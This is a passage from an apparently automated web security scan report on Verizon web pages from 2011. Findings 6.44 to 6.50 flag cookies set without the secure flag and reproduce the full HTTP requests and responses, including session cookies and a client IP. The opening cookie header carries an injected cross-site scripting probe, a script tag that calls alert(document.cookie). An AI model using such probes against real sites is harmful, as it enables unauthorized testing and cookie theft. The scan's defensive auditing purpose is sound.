ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 0
Expires: Mon, 05 Sep 2011 22:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:42:02 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:47:02 GMT; path=/foryourhome/; domain=verizon.com

6.44. https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*

Response

HTTP/1.0 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: HTTPS://WWW22.VERIZON.COM/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
Content-Type: text/html; charset=utf-8
Content-Length: 261
Expires: Mon, 05 Sep 2011 22:25:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:33 GMT
Connection: keep-alive
Set-Cookie: GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; domain=.verizon.com; path=/
Set-Cookie: urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; path=/; secure; HttpOnly

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="HTTPS://WWW22.VERIZON.COM/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&
...[SNIP]...

6.45. https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/content/VerizonGlobalHome/validlogin.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ak-sf=false; expires=Mon, 05-Sep-2011 22:24:46 GMT; path=/content/; domain=verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/VerizonGlobalHome/validlogin.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/content/verizonglobalhome/res_signin.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 638
Cache-Control: private, max-age=1791
Date: Mon, 05 Sep 2011 22:19:46 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:24:46 GMT; path=/content/; domain=verizon.com

var aType=new Array("retailconsumer","retailgeneralbiz","eservices");var aLOB=new Array("myvz","myvzquickpay","concos","rescos","smbcos","retailgenbiz","retailconsumer","callassistant");var ckType='';
...[SNIP]...

6.46. https://www22.verizon.com/images/body/gradientsectionhdr.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/images/body/gradientsectionhdr.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/body/gradientsectionhdr.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 294
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/body/gradientsectionhdr.gif
Last-Modified: Thu, 23 Jul 2009 15:51:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:06 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/;httponly

GIF89a..2....................................................................................................!.......,......2.....!.di.P..l..p,.Dm.x~7|....p.C......h:...tJ.....v..z...xL.....z.V....|..
...[SNIP]...

6.47. https://www22.verizon.com/images/headerfooter/bubbletranswhite.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/images/headerfooter/bubbletranswhite.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660;path=/;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/bubbletranswhite.png HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 2314
Content-Type: image/png
Content-Location: http://www22.verizon.com/images/headerfooter/bubbletranswhite.png
Last-Modified: Thu, 23 Jul 2009 15:57:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660;path=/;httponly

.PNG
.
...IHDR.......c......8......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.bd..`D..ad...f@.G.(... ... .1....2.?..hF...
.....d f(....1.e..P.....hF.........3.3R.a.....&.... ..w4#...
...[SNIP]...

6.48. https://www22.verizon.com/images/headerfooter/scbsmbbodytile.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/images/headerfooter/scbsmbbodytile.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbbodytile.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 341
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbbodytile.gif
Last-Modified: Sun, 17 Jul 2011 02:18:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/;httponly

GIF89a
.~....................................................................................................!.......,....
.~....`%.$e.......p$.4d.x.......pH,..@.r.l:...t.lX...v..z.`+cL.....z../...|N.
...[SNIP]...

6.49. https://www22.verizon.com/images/headerfooter/scbsmbdivider.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/images/headerfooter/scbsmbdivider.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_xxx22_tqmbu_mcw=ffffffff895bc66645525d5f4f58455e445a4a423660;path=/;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbdivider.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 307
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbdivider.gif
Last-Modified: Sun, 17 Jul 2011 02:18:35 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66645525d5f4f58455e445a4a423660;path=/;httponly

GIF89a..8...............................................................................................................................................................................................
...[SNIP]...

6.50. https://www22.verizon.com/images/headerfooter/scbsmbdividerhoriz.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/images/headerfooter/scbsmbdividerhoriz.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_xxx22_tqmbu_mcw=ffffffff895bc66645525d5f4f58455e445a4a423660;path=/;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/headerfooter/scbsmbdividerhoriz.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 389
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbdividerhoriz.gif
Last-Modified: Sun, 17 Jul 2011 02:18:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66645525d5f4f58455e445a4a423660;path=/;httponly

